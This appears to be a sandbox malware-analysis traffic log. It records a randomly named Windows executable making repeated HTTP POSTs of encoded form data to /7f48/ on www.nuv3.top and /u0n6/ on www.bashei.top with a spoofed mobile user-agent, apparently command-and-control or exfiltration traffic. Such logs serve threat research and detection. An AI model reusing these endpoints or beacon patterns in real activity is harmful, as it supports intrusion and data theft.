                                                              1192.168.2.759661152.53.38.0805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:03.631483078 CEST684OUTPOST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 56 39 39 64 45 67 32 48 5a 6f 63 47 38 56 6b 44 6d 43 4d 39 79 77 63 47 45 61 64 79 59 4f 47 44 4b 77 6a 43 74 46 4f 6c 6c 4a 4b 4c 30 7a 4c 46 4e 2b 77 76 35 73 37 75 45 31 32 62 44 73 6e 73 75 75 77 32 46 61 57 53 6e 75 6e 35 6f 39 53 77 74 64 38 59 67 6e 5a 34 55 6f 6b 6b 67 68 33 46 33 43 5a 61 6a 41 4c 37 79 55 44 45 31 58 62 34 6e 64 48 30 30 78 67 57 75 51 66 59 2f 67 6d 72 76 79 4f 31 52 45 35 57 75 5a 32 54 6f 44 36 59 49 32 4b 6b 7a 39 79 72 41 64 59 75 51 2b 48 57 4f 7a 6f 4c 32 6f 74 35 2b 71 4b 65 79 4f 53 63 46 6f 4c 2f 33 71 74 68 78 50 64 63 7a 33 46 58 31 6d 51 74 41 33 64 6d 6c 43 37 41 69 63 6f 34 78 41 3d 3d
                                                              Data Ascii: XvhP6L=V99dEg2HZocG8VkDmCM9ywcGEadyYOGDKwjCtFOllJKL0zLFN+wv5s7uE12bDsnsuuw2FaWSnun5o9Swtd8YgnZ4Uokkgh3F3CZajAL7yUDE1Xb4ndH00xgWuQfY/gmrvyO1RE5WuZ2ToD6YI2Kkz9yrAdYuQ+HWOzoL2ot5+qKeyOScFoL/3qthxPdcz3FX1mQtA3dmlC7Aico4xA==
                                                              Sep 11, 2024 22:55:04.090749025 CEST279INHTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:55:04 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close
                                                              Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                              Data Ascii: a
                                                              Sep 11, 2024 22:55:04.090867043 CEST713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                              Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.759662152.53.38.0805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:06.177545071 CEST704OUTPOST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 56 39 39 64 45 67 32 48 5a 6f 63 47 75 6c 30 44 6b 6a 4d 39 6c 67 63 46 49 36 64 79 53 75 47 50 4b 77 66 43 74 48 69 50 6c 62 75 4c 30 57 76 46 43 62 45 76 36 73 37 75 4d 56 33 54 48 73 6e 33 75 75 74 44 46 62 71 53 6e 75 7a 35 6f 38 69 77 73 75 56 4f 69 33 5a 6d 63 49 6b 6d 2f 78 33 46 33 43 5a 61 6a 41 65 57 79 55 62 45 70 33 4c 34 6d 2f 2f 7a 6f 68 67 56 70 51 66 59 31 41 6e 69 76 79 4f 48 52 41 5a 38 75 62 4f 54 6f 43 4b 59 49 48 4b 6e 34 39 79 74 45 64 5a 6d 52 72 7a 54 42 52 4d 48 7a 75 64 43 77 64 53 2f 7a 34 50 2b 66 4b 48 54 70 37 56 61 31 4e 35 71 6b 52 59 69 33 6e 55 31 4e 56 70 48 36 31 65 71 76 4f 4a 38 6e 34 66 56 70 64 70 57 54 38 33 55 65 64 77 76 54 45 38 69 45 57 4d 3d
                                                              Data Ascii: XvhP6L=V99dEg2HZocGul0DkjM9lgcFI6dySuGPKwfCtHiPlbuL0WvFCbEv6s7uMV3THsn3uutDFbqSnuz5o8iwsuVOi3ZmcIkm/x3F3CZajAeWyUbEp3L4m//zohgVpQfY1AnivyOHRAZ8ubOToCKYIHKn49ytEdZmRrzTBRMHzudCwdS/z4P+fKHTp7Va1N5qkRYi3nU1NVpH61eqvOJ8n4fVpdpWT83UedwvTE8iEWM=
                                                              Sep 11, 2024 22:55:06.622433901 CEST279INHTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:55:06 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close
                                                              Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                              Data Ascii: a
                                                              Sep 11, 2024 22:55:06.622704029 CEST713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                              Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.759663152.53.38.0805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:08.729110956 CEST1717OUTPOST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 56 39 39 64 45 67 32 48 5a 6f 63 47 75 6c 30 44 6b 6a 4d 39 6c 67 63 46 49 36 64 79 53 75 47 50 4b 77 66 43 74 48 69 50 6c 62 6d 4c 30 67 6a 46 44 38 6f 76 31 4d 37 75 47 31 33 53 48 73 6d 6c 75 75 6c 48 46 62 6e 76 6e 73 4c 35 75 61 32 77 72 66 56 4f 6f 33 5a 6d 65 49 6b 6e 67 68 33 51 33 43 49 54 6a 41 4f 57 79 55 62 45 70 79 50 34 77 64 48 7a 37 52 67 57 75 51 66 75 2f 67 6d 4c 76 79 58 79 52 41 64 47 75 4b 75 54 72 69 61 59 62 46 69 6e 78 39 79 76 4a 39 59 67 52 72 32 44 42 52 52 30 7a 71 55 6e 77 61 32 2f 7a 39 69 45 59 75 66 66 71 34 46 7a 32 39 78 4e 78 44 45 32 39 42 49 52 41 56 70 6f 34 58 75 53 33 75 78 77 72 50 6d 31 34 73 35 6a 65 38 58 73 53 4c 74 6c 41 30 4a 6f 65 6d 4d 35 39 30 4a 46 64 6d 75 61 46 59 64 48 65 6e 58 57 65 67 41 30 64 6d 72 2f 37 33 55 59 4b 45 34 6e 62 77 6a 45 72 45 75 62 55 62 2b 6f 45 38 49 47 61 65 37 68 58 30 47 67 38 73 58 39 4e 72 39 59 33 64 75 31 7a 79 49 39 62 51 65 7a 53 6c 38 63 35 67 78 51 66 48 76 6f 57 36 79 33 68 66 41 4b 6d 5a 32 [TRUNCATED]
                                                              Data Ascii: XvhP6L=V99dEg2HZocGul0DkjM9lgcFI6dySuGPKwfCtHiPlbmL0gjFD8ov1M7uG13SHsmluulHFbnvnsL5ua2wrfVOo3ZmeIkngh3Q3CITjAOWyUbEpyP4wdHz7RgWuQfu/gmLvyXyRAdGuKuTriaYbFinx9yvJ9YgRr2DBRR0zqUnwa2/z9iEYuffq4Fz29xNxDE29BIRAVpo4XuS3uxwrPm14s5je8XsSLtlA0JoemM590JFdmuaFYdHenXWegA0dmr/73UYKE4nbwjErEubUb+oE8IGae7hX0Gg8sX9Nr9Y3du1zyI9bQezSl8c5gxQfHvoW6y3hfAKmZ276LbepbRKlpTZgta0igPfM4F3kNAhnNyzmngFwfjgdt0vHGIrXe2OL/bml3YyOWZubkcWOBmdkJmzbH+y52Uh82WP5WDS4Xt8G3NM3DoFnY/OcJ3idw7sNFC3PBC8WUeu6PFI+s8UBDE3BegB6+4VowtTlkgvGJe8BNjAKx9st09NhA+O/Und9OLNE3rleQOiYk5VW4LLtU4rD/H1hn1wAMJQnveFpDVozbs+Eq23WX/dTld4h63M1UdZuggskimkqlrr4fChiflAX+nLkgpNhqWx4voKEYb2xhNdHW3uPuQUblIHbJ864GdjDD+pA/93Gk+l7Sa10LhNEX5b9/nI2V2S2+wIKzL4wq03DaO1Z7kPoMqmGdX3v1xh5A5p86LScu18VQDwf8uZAxNNwLyKx34CogESKU51A+oGD96Do7yyTGr7YTzmkpmaverZHB/IcS1y5G7R5aXcqgiiTONfV+t5XRVg2Bg7jd1grASJV/NgrgmYkiJRq9nd0RQDvQtmd8PgPq+m5IRfnI2i5OZ71XiRYSm3jLjQo7LdmMwKHHDCoDPcJtHMrS19GdQvcPe3nK/aw2QYUb0tpl/TUyrDcUnNavhVwxEOUGRyU+tfPgL+Rezsy2AsFkaHY6xLiyQBzJGwuCXsCkGtBoNbcazz9JiFR2T3LgEP4 [TRUNCATED]
                                                              Sep 11, 2024 22:55:09.182925940 CEST992INHTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:55:09 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close
                                                              Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 [TRUNCATED]
                                                              Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$NhuB+c9>(:.+v6IW`l2xcxz+:}_-ohWvT$dm47/kDa-4_Jt] %6$YvLi>Fj3bC{.~p/+a0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.759665152.53.38.0805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:11.268712044 CEST436OUTGET /7f48/?XvhP6L=Y/V9HWeQI6V9wDpav31Zmzk5MY4+Ou2xQiPhqUb5lc+p8ROSXtAF44jgGkfnSdbIjMV3KY+ys+uzmsyZr9wUrSReS7kDqE3Vwy5Stw7V8E2w1yWugNHB1ko6qS7b9UC1jiexBCRL4rzt&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.nuv3.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:55:11.746623993 CEST1236INHTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              content-length: 1249
                                                              date: Wed, 11 Sep 2024 20:55:11 GMT
                                                              server: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                              Sep 11, 2024 22:55:11.746649981 CEST224INData Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c
                                                              Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.75966623.225.34.75805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:17.300864935 CEST690OUTPOST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 65 6c 2f 76 4b 6d 35 42 4d 77 4b 74 65 39 48 7a 78 62 30 76 65 4c 7a 54 4c 4f 63 38 32 62 47 72 54 54 71 72 7a 46 41 65 4b 6e 6d 37 44 41 54 44 78 58 46 55 74 52 42 42 37 76 6d 67 6a 4a 6a 4a 51 64 54 59 37 78 39 6a 4c 34 79 44 6e 63 65 73 59 4d 63 53 45 62 4e 79 36 4f 4e 71 47 33 73 73 42 45 52 62 70 4b 72 37 50 6f 4b 4d 50 37 75 79 64 71 65 58 6f 66 53 64 52 31 36 36 35 31 76 52 59 6e 63 68 4c 64 45 58 2f 66 45 4e 72 41 42 59 61 61 49 6d 34 4c 4d 4a 63 63 77 6d 43 4a 63 6c 33 67 6d 62 38 35 37 34 6e 73 61 6c 36 30 4f 42 4d 2b 6f 74 76 41 6b 4c 62 41 33 30 4b 5a 77 72 58 2f 64 6d 6a 4a 55 78 74 43 72 71 6b 42 34 4d 2b 41 3d 3d
                                                              Data Ascii: XvhP6L=el/vKm5BMwKte9Hzxb0veLzTLOc82bGrTTqrzFAeKnm7DATDxXFUtRBB7vmgjJjJQdTY7x9jL4yDncesYMcSEbNy6ONqG3ssBERbpKr7PoKMP7uydqeXofSdR16651vRYnchLdEX/fENrABYaaIm4LMJccwmCJcl3gmb8574nsal60OBM+otvAkLbA30KZwrX/dmjJUxtCrqkB4M+A==
                                                              Sep 11, 2024 22:55:17.898739100 CEST707INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:55:17 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Data Raw: 31 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 54 3d 6f db 30 10 dd f5 2b 04 4f 52 91 90 56 5a 3b 72 23 1b 88 8b a6 48 01 37 09 dc 22 43 90 e1 2c 9e 25 ba 12 a9 92 94 3f 60 e6 bf 97 96 15 23 e8 d4 41 43 7b 0b 8f 77 c7 87 87 f7 0e 4c 72 53 16 13 2f c9 11 d8 24 31 dc 14 38 f9 d0 7f ef df 48 b5 e0 8c a1 48 e8 b1 98 d0 66 c4 4b 16 92 ed dc 91 a2 30 a8 26 49 1e fd 39 ef 2a 09 6d db 0e d8 cd b4 17 91 71 b1 7d d3 a2 2d 14 3d 72 f0 fe 99 48 74 aa 78 65 7c b3 ab 70 dc 33 b8 35 74 05 6b 38 56 7b be 56 e9 b8 97 1b 53 e9 8f 94 ae 34 a9 35 2a 4d 06 11 29 80 5e 44 f1 20 1a c6 97 64 a5 7b 4e 86 e3 13 27 57 8b 58 80 c8 6a c8 1c ea 1b c0 89 c7 97 c1 86 0b 26 37 44 c0 9a 67 60 a4 6a 50 af 33 a7 32 29 c1 a4 79 40 83 2a 97 02 6d 05 cc 56 92 59 7e df 5c f9 fd 21 97 da 25 c0 42 ca c3 d0 df 7b 1a cd 77 5e a2 ac 4d b0 ac 45 6a b8 14 41 b8 5f 83 f2 41 a9 f1 d3 89 3c c0 e0 72 d8 8f e2 e1 88 6c c5 f9 b9 11 bf b6 71 94 c6 83 4c 44 72 54 33 92 ca 92 3a 56 a2 90 c0 e8 eb e8 29 81 88 1c 9c eb 9d 75 85 77 71 c4 7b be 6a c5 28 64 [TRUNCATED]
                                                              Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.75966723.225.34.75805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:19.848762035 CEST710OUTPOST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 65 6c 2f 76 4b 6d 35 42 4d 77 4b 74 50 73 58 7a 39 59 63 76 5a 72 7a 55 46 75 63 38 34 37 47 76 54 53 57 72 7a 45 56 5a 4b 56 43 37 43 69 62 44 2f 32 46 55 73 52 42 42 7a 50 6d 6c 74 70 6a 57 51 64 66 71 37 30 46 6a 4c 35 57 44 6e 64 75 73 59 2b 30 52 45 4c 4e 77 38 4f 4e 73 59 48 73 73 42 45 52 62 70 4b 75 7a 50 6f 43 4d 50 4b 65 79 53 75 4b 51 67 2f 53 61 57 31 36 36 7a 56 76 4e 59 6e 63 44 4c 63 59 78 2f 64 4d 4e 72 45 46 59 61 49 77 6c 79 4c 4d 50 59 63 78 6c 4a 37 70 2b 74 43 69 5a 30 34 32 6d 6f 63 6d 47 37 43 54 6a 57 63 6b 42 78 52 63 77 66 43 54 43 64 2f 74 65 56 2b 5a 2b 75 72 67 51 79 31 4f 41 70 54 5a 49 6f 30 71 72 61 74 78 58 71 6e 73 35 69 4d 66 73 4c 6c 47 6d 44 36 41 3d
                                                              Data Ascii: XvhP6L=el/vKm5BMwKtPsXz9YcvZrzUFuc847GvTSWrzEVZKVC7CibD/2FUsRBBzPmltpjWQdfq70FjL5WDndusY+0RELNw8ONsYHssBERbpKuzPoCMPKeySuKQg/SaW166zVvNYncDLcYx/dMNrEFYaIwlyLMPYcxlJ7p+tCiZ042mocmG7CTjWckBxRcwfCTCd/teV+Z+urgQy1OApTZIo0qratxXqns5iMfsLlGmD6A=
                                                              Sep 11, 2024 22:55:21.072299004 CEST707INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:55:20 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Data Raw: 31 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 54 3d 6f db 30 10 dd f5 2b 04 4f 52 91 90 56 5a 3b 72 23 1b 88 8b a6 48 01 37 09 dc 22 43 90 e1 2c 9e 25 ba 12 a9 92 94 3f 60 e6 bf 97 96 15 23 e8 d4 41 43 7b 0b 8f 77 c7 87 87 f7 0e 4c 72 53 16 13 2f c9 11 d8 24 31 dc 14 38 f9 d0 7f ef df 48 b5 e0 8c a1 48 e8 b1 98 d0 66 c4 4b 16 92 ed dc 91 a2 30 a8 26 49 1e fd 39 ef 2a 09 6d db 0e d8 cd b4 17 91 71 b1 7d d3 a2 2d 14 3d 72 f0 fe 99 48 74 aa 78 65 7c b3 ab 70 dc 33 b8 35 74 05 6b 38 56 7b be 56 e9 b8 97 1b 53 e9 8f 94 ae 34 a9 35 2a 4d 06 11 29 80 5e 44 f1 20 1a c6 97 64 a5 7b 4e 86 e3 13 27 57 8b 58 80 c8 6a c8 1c ea 1b c0 89 c7 97 c1 86 0b 26 37 44 c0 9a 67 60 a4 6a 50 af 33 a7 32 29 c1 a4 79 40 83 2a 97 02 6d 05 cc 56 92 59 7e df 5c f9 fd 21 97 da 25 c0 42 ca c3 d0 df 7b 1a cd 77 5e a2 ac 4d b0 ac 45 6a b8 14 41 b8 5f 83 f2 41 a9 f1 d3 89 3c c0 e0 72 d8 8f e2 e1 88 6c c5 f9 b9 11 bf b6 71 94 c6 83 4c 44 72 54 33 92 ca 92 3a 56 a2 90 c0 e8 eb e8 29 81 88 1c 9c eb 9d 75 85 77 71 c4 7b be 6a c5 28 64 [TRUNCATED]
                                                              Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.75966823.225.34.75805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:22.396318913 CEST1723OUTPOST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
